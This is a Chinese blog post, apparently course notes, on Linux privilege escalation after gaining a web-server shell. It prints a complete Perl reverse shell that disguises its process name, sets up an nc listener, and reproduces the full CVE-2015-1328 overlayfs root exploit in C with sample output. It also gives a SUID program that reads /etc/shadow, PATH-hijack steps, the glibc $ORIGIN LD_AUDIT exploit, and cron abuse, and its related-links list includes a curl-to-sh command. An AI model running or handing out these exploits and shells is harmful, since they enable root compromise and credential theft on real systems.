LINUX提权

最新推荐文章于 2024-09-06 15:36:44 发布
最新推荐文章于 2024-09-06 15:36:44 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: 暗月笔记 文章标签: linux 运维 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RMC131/article/details/130252051
版权
文章介绍了在Linux环境中,如何通过内核漏洞和webshell来实现权限提升。首先,利用perl-reverse-shell.pl创建反弹shell,然后查找特定内核版本的漏洞(如CVE-2015-1328),通过编译和运行恶意代码实现从低权限用户到root权限的提权。此外,还讨论了SUID权限、环境变量劫持以及CronJobs计划任务的潜在提权方法。
摘要由CSDN通过智能技术生成

LINUX提权

LINUX内核漏洞提权

简介

渗透时通常拿到的webshell的权限只是web容器的权限,在IIS就是IIS(windows)用户组权限,在apache就是apache(www-data)权限,只能执行一些普通命令,例如查看当前用户、网络信息等,想进一步进行内网渗透就需要提高权限到系统权限或是root权限。

利用

获取webshell:http://www.moontester.com/1.php

查看linux发行版本

cat /etc/issue

cat /etc/*release

查看内核版本

uname -a

Linux ubuntu-virtual-machine 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:37 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

先利用webshell在本机执行:nc -lvvp 1234

在shell上传并执行perl-reverse-shell.pl 即可连接(chmod +x perl-reverse-shell.pl )

https://github.com/pentestmonkey/perl-reverse-shell/blob/master/perl-reverse-shell.pl

my $ip = '127.0.0.1';
my $port = 1234;

改为自己的ip和端口

#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  The author accepts no liability
# for damage caused by this tool.  If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#

use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
my $ip = '127.0.0.1';
my $port = 1234;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
		# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
	cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

	if ($auth) {
		unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
			cgiprint("ERROR: Your client isn't authorised to view this page");
			cgiexit();
		}
	}
} elsif ($auth) {
	cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
	cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
	my $pid = fork();
	if ($pid) {
		cgiexit(0); # parent exits
	}

	setsid();
	chdir('/');
	umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
	cgiprint("Sent reverse shell to $ip:$port");
	cgiprintpage();
} else {
	cgiprint("Couldn't open reverse shell to $ip:$port: $!");
	cgiexit();	
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
	my $line = shift;
	$line .= "<p>\n";
	$global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
	cgiprintpage();
	exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
	print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

id查看权限:uid=33(www-data) gid=33(www-data) groups=33(www-data)

whoami查看用户:www-data

EXP:https://www.exploit-db.com/

查找3.19,找到本地提权的exp:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - ‘overlayfs’ Local Privilege Escalation(https://www.exploit-db.com/exploits/37292)

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
   char *file;
   system("rm -rf /tmp/ns_sploit");
   mkdir("/tmp/ns_sploit", 0777);
   mkdir("/tmp/ns_sploit/work", 0777);
   mkdir("/tmp/ns_sploit/upper",0777);
   mkdir("/tmp/ns_sploit/o",0777);

   fprintf(stderr,"mount #1\n");
   if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
       if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
           fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
           exit(-1);
       }
       file = ".access";
       chmod("/tmp/ns_sploit/work/work",0777);
   } else file = "ns_last_pid";

   chdir("/tmp/ns_sploit/o");
   rename(file,"ld.so.preload");

   chdir("/");
   umount("/tmp/ns_sploit/o");
   fprintf(stderr,"mount #2\n");
   if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
       if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
           exit(-1);
       }
       chmod("/tmp/ns_sploit/work/work",0777);
   }

   chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
   umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
   int status, fd, lib;
   pid_t wrapper, init;
   int clone_flags = CLONE_NEWNS | SIGCHLD;

   fprintf(stderr,"spawning threads\n");

   if((wrapper = fork()) == 0) {
       if(unshare(CLONE_NEWUSER) != 0)
           fprintf(stderr, "failed to create new user namespace\n");

       if((init = fork()) == 0) {
           pid_t pid =
               clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
           if(pid < 0) {
               fprintf(stderr, "failed to create new mount namespace\n");
               exit(-1);
           }

           waitpid(pid, &status, 0);

       }

       waitpid(init, &status, 0);
       return 0;
   }

   usleep(300000);

   wait(NULL);

   fprintf(stderr,"child threads done\n");

   fd = open("/etc/ld.so.preload",O_WRONLY);

   if(fd == -1) {
       fprintf(stderr,"exploit failed\n");
       exit(-1);
   }

   fprintf(stderr,"/etc/ld.so.preload created\n");
   fprintf(stderr,"creating shared library\n");
   lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
   write(lib,LIB,strlen(LIB));
   close(lib);
   lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
   if(lib != 0) {
       fprintf(stderr,"couldn't create dynamic library\n");
       exit(-1);
   }
   write(fd,"/tmp/ofs-lib.so\n",16);
   close(fd);
   system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
   execl("/bin/su","su",NULL);
}

增加运行权限:chmod +x ofs

运行:./ofs

$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

切换Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

python3 -c "__import__('subprocess').call(['/bin/bash'])"

LINUX SUID提权

简介

SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。

SUID是一对种二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属于程序属主的权限(仅对拥有执行权限的二进制文件有效。例如:所有用户都可以使用passwd命令来工更改自己的密码,而密码保存在/etc/shadow中,普通用户是没有读写权限的,但只有root用户拥有读写权限,但在使用passwd命令时,加上SUID特殊权限位,就可以让普通用户临时获取读写该文件的权限。(个人理解和sudo一个道理)

利用

C源码

#include<stdlib.h>
#include<unistd.h>
int main(){
    setuid(0);//run as root
    system("id");
    system("cat /etc/shadow");
    return 0;
}

root用户下编译和权限设置

gcc suid.c -o suid-exp

chmod 4775 suid-exp

这样在普通用户下执行suid-exp也可以执行成功,读取到/exc/shadow文件的内容

find / -perm -u=s -type f 2>/dev/null此命令可以查询所有带suid属性的文件

劫持环境变量提权

创建一个文件并赋予权限,cat回生成shell

echo "/bin/bash">cat && chmod 777 cat

查看当前环境变量

echo $PATH

将当前目录使用普通用户临时加入环境变量

export PATH=.:$PATH

此时以普通用户权限运行suid-exp,执行到system("cat /etc/shadow");因为cat优先使用环境变量中的cat,也就是当前目录的cat,劫持到了root权限

原理: system函数继承环境变量,所以此时替换环境变量可以达到提权的目的

GNU C Library动态链接区 $ORIGIN 溢出漏洞提权

利用tmp目录权限,suid权限和C语言使普通用户提权为root

适用于 RHEL5-RHEL6 CENTOS5-CNETOS6

利用方法

环境是Centos5

创建目录
mkdir /tmp/exploit

创建target文件硬链接
ln /bin/ping /tmp/exploit/target

把target文件加载到内存中
exec 3< /tmp/exploit/target

查看target在内存中的情况
ls -l /proc/$$/fd/3

删除目录
rm -rf /tmp/exploit/
ls -l /proc/$$/fd/3

新建并写入C代码
cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}

编译
gcc -w -fPIC -shared -o /tmp/exploit payload.c
ls -l /tmp/exploit

提升权限
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

Linux Cron Jobs提权

Cronin Jobs计划任务通过/etc/crontab文件,可以设定系统定期执行的任务

利用

crontab文件只有root用户有读写权限,在得到一个非root权限的远程登录用户的时候,可以查看/etc/crontab文件内容

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/2 *   * * *   root    /tmp/cleanup.py
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

python脚本用来删除/home/ubuntu/cleanup/目录下的所有内容

#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -rf /home/ubuntu/cleanup/*')
        # os.system('chmod u+s /bin/dash')
except:
        sys.exit()

关键是要有这么个计划任务才行

RICKC131
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
linux提权
weixin_43873557的博客
02-10 453
gcc编译exp要使用相对应版本的机器,然后再上传 sudo /bin/bash vim /etc/netplan/50 修改ens33 netplan apply 修改键盘 vim /etc/default/keyb curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh 01操作系统信息 ➢ 查看发行版本 cat
Linux提权
liver100day的博客
11-16 4497
文章目录Linux提权1.1 sudo提权1.2 suid提权1.3 计划任务cron1.4 内核漏洞提权2.4.4 Linux_Exploit_Suggester(提权辅助工具)2.5 利用可写文件2.6、明文root密码提权2.7、密码复用2.8 查看用户最后编辑的文件2.9 查找敏感文件2.10 用grep查找有密码的文件后言 Linux提权 linux的权限划分没有windows的复杂,提权只需要从普通权限提升到root权限就可以了。 1.1 sudo提权 先进行尝试sudo su,查看是否为空密码
史上最全Linux提权后获取敏感信息方法
真理部
01-21 2309
在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节. 文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的
linuxapache权限提升,LinuxApache服务 第三弹(权限控制)
weixin_42127775的博客
05-08 363
以上两边博客,介绍apache软件的一些基于不同的简单配置,这篇博客就简单的介绍一下网站的权限控制问题.还是拿第一篇博客的配置文件来举例子.现在我又两个网站一个是www.demo.com,一个是www.abc.com。现在我的测试两个网站都能够访问,现在要做的是让测试机不能访问www.demo.com却能够访问www.abc.com这边我的测试机的地址是192.168.220.132。知道IP地址...
linux系统提权——基于已经拿到www-data权限
热门推荐
m0re's blog
08-25 1万+
前言:上次学习利用目录遍历漏洞获取了一个反弹的webshell,但是权限是www-data,不是root权限,所以这次学习提权,拿到root权限。 本文目录提权介绍提权方式内核漏洞提权明文root密码提权计划任务总结: 提权介绍 往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 提权前提: 已经拿到低权shell 被入侵的机器上面有nc,python,perl等非常常见的工具 有权
linux apache内网渗透,内网渗透 day8-linux提权和后门植入
weixin_31304817的博客
05-14 307
linux提权和后门植入1. 脏牛漏洞复现(1) 去网页上把dirty.c中的代码复下来,制然后touch(创建)一个.c文件,vi或者vim打开将代码复制进去保存(不能在kali上直接wget下载https://github.com/FireFart/dirtycow/blob/master/dirty.c,因为这样会把整个网页下载下来(亲测))(2) 进入shell然后从kali开的apach...
linux 提升apache权限,Apache HTTP Server envvars本地权限提升漏洞
weixin_29006187的博客
04-29 217
发布日期:2012-09-13更新日期:2012-09-15受影响系统:Apache Group HTTP Server < 2.4.2描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-0883Apache HTTP Server是Apache...
网安学习-Linux提权
weixin_44770698的博客
07-23 1448
网安学习-Linux提权
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统中,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux提权手法总结以及 Linux提权exp集合
02-22
本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
Linux提权扫描脚本
04-28
这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法、提权扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、提权原理 在Linux系统中,权限分为三类:用户权限、组权限和所有者权限。...
Linux提权姿势二:利用NFS提权
09-01
Linux 提权姿势二:利用 NFS 提权 Linux 提权姿势二:利用 NFS 提权是指在 Linux 系统中,利用 NFS(Network File System)共享来升级特权的一种方法。当我们拥有低特权的 shell 并且发现服务器中具有 NFS 共享时,...
Linux常见提权
weixin_30892889的博客
09-13 393
常见的linux提权 内核漏洞提权 查看发行版 cat /etc/issue cat /etc/*-release 查看内核版本 uname -a 查看已经安装的程序 dpkg -l rpm -qa 通过一些现有的exp,上传到目标主机,执行exp,直接获取root权限 github地址https://github.com/SecWiki/l...
权限提升:利用Linux漏洞提权
qq_68163788的博客
02-13 2500
Linux漏洞提权是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的权限。这种方法通常被黑客用来获取系统管理员权限,从而可以对系统进行更深入的攻击和控制。 一种常见的Linux漏洞提权方法是利用内核漏洞。内核是操作系统的核心部分,负责管理系统的资源和提供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞来提升权限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的权限。
linux提权总结
qk的专栏
05-12 1723
ernel, Operating System & Device Information: Command Result uname -a Print all available system information uname -r Kernel release uname -n System hostname hostname
linux 提权总结_linux提权,字节跳动网络安全面试凉凉经
2401_84166878的博客
04-09 726
如何查找?(1)通过find可用于反弹shell有netcat:有php:php -r ‘需要注意的是,php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。有python:普通用户反弹带suid的find命令反弹-ip表示以特权模式启动的一个交互式shell(2)cp利用openssl生成密码将/etc/passwd文件复制到当前目录,添加用户,并且添加密码上面添加了aaa用户,但是用户id为0,表示root权限。
实战Linux下三种不同方式的提权技巧
fly小灰灰的专栏
03-17 1万+
介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到 获取到低权限SHELL后我们通常做下面几件事1.检测操作系
掌握 Linux 命令的艺术:深入解析与实用指南
最新发布
hacker__的博客
09-06 1357
Linux操作系统是和windows操作系统是并列的关系。只不过只是两个操作系统的特性各有不同而已。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值